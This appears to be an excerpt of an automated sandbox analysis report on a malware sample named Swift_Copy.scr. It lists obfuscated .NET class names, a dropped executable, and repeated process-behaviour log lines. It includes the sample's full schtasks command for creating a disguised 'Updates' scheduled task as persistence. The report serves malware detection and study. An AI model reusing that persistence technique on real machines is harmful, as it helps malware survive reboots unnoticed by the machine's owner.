                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, UTGQOOw6OPjkFM2VKM.csHigh entropy of concatenated method names: 'Dispose', 'df3t5pDVEJ', 'dabhKqCpq3', 'ztLXXaBGQC', 'asytqQdKok', 'Ps8tzedw2A', 'ProcessDialogKey', 'M4Ehv5DXy2', 'oGXht8JHc3', 'u1ZhhbWAq5'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, zWAq5ZqEQ70vicMem8.csHigh entropy of concatenated method names: 'bDhDtAoRry', 'iXcDLgX2Qe', 'imuDduMKjS', 'iG1DHQ2VSY', 'SOEDwhl32R', 'aevDWe95Ms', 'qqtDM7pXRP', 'nZS0sfOeLf', 'Ghd02EIkBg', 'vtO05shurH'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, WyQdKo2k8s8edw2Am4.csHigh entropy of concatenated method names: 'M5g0HvY5Jo', 'P1y0wUDnbU', 'dvk0PY4doH', 'xsm0WEsB4m', 'w5C0M4E7af', 'ATu0C1oETt', 'BJO06NNoYU', 'Bf90jEPu19', 'TsR0Zf77AT', 'mLW0UJqqnK'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, kS3cTkm997BAqLLlhG.csHigh entropy of concatenated method names: 'e68COBJJxb', 'kC3CfvZFui', 't32CbCClLD', 'sjoC1cRVrW', 'NldCGwbZhV', 'DPJC4rygJW', 'mB3CrLWMNh', 'B1aCJkFNYR', 'AjNCSruWK7', 'lvcCcSuOPd'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, kATSQ5QhDPFqb6YBF3.csHigh entropy of concatenated method names: 'r4QYZAgOol', 'gWNYUaeFdD', 'ToString', 'dj0YHq3pKn', 'gcDYwZ0jHv', 'k26YPGQ3sV', 'mFvYWApjp9', 'BJpYMYhfEW', 'AhPYCXHfrX', 'o3FY66pJiQ'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, bMka7RhLoveaww4eV3.csHigh entropy of concatenated method names: 'GdnbjhwsX', 'dli1qWP5J', 'dsD4hJJmH', 'DWZrgNwAm', 'eyLS3Osvu', 'jAic3HqgA', 'QBu22ubrL98C9t5CUw', 'xnDoEsyvAbqrxhFHnl', 'hrBw6BMy96TUSrQg3Z', 'LMH0vlYQ4'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, rWUR7gJwO4M8XQmEUW.csHigh entropy of concatenated method names: 'iViwAdi0yR', 'OVgw9wGUd5', 'fHKwgwx6Xq', 'lAXwQYxnfT', 'dNQwp1sHUS', 'svNw34fj8n', 'zGgwsfBXp2', 'SYZw2kKApi', 'oCMw52Eq84', 'se4wqxusAZ'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, DVKBuqSSNpJg3IAgbJ.csHigh entropy of concatenated method names: 'a9tP1EeW4Z', 'DfNP4C64Tj', 'AZwPJkEE2g', 'ebqPSNg5fL', 'q7TPljHZqk', 'SahPIjEEgK', 'XykPYdmksG', 'tNeP0TgUoJ', 'bPhPDBM7B9', 'vK2Pn5qVPT'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, Iy9Tgqz43IelUyKJXv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iyNDRBdeES', 'bXiDlraGku', 'AyZDIqLrBK', 'paODYKfrha', 'IKbD0OXnJ8', 'GrhDDtI1bQ', 'Os3Dn7lMW4'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, g6SGhFPhI7nejp3SeQ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XWoh5HTlKu', 'b7Bhqplfcg', 'NEPhzF3uoi', 'E8QLvdVfP5', 'Gy1Lt5VRoG', 'wxWLhsTcFO', 'sbALLkDgwr', 'SREYO779iyUWS4XCsJ8'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, EvkiPGgVYGUxUYNOdZ.csHigh entropy of concatenated method names: 'ToString', 'TZGIxAFmur', 'YVUIKhQ7Vm', 'L1UIVZZQCq', 'KUfI7jMNWw', 'EbqIok8YYt', 'h2PIEIv4dM', 'z5RIBJEBiB', 'y2HINVRIgW', 'JIlImJ1CXi'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, iwtTH6AbfoWbx1OhVT.csHigh entropy of concatenated method names: 'gVElySMNds', 'jLwlaxyBpQ', 't4wlACIiBD', 'K2hl9ktk1Q', 'fmFlKBlS96', 'IjklV8Kqcm', 'raBl7Geqts', 'LBWloLUxJb', 'kGIlEIKW2l', 'CBllB2Q3n5'
                    Source: C:\Users\user\Desktop\Swift_Copy.scrFile created: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
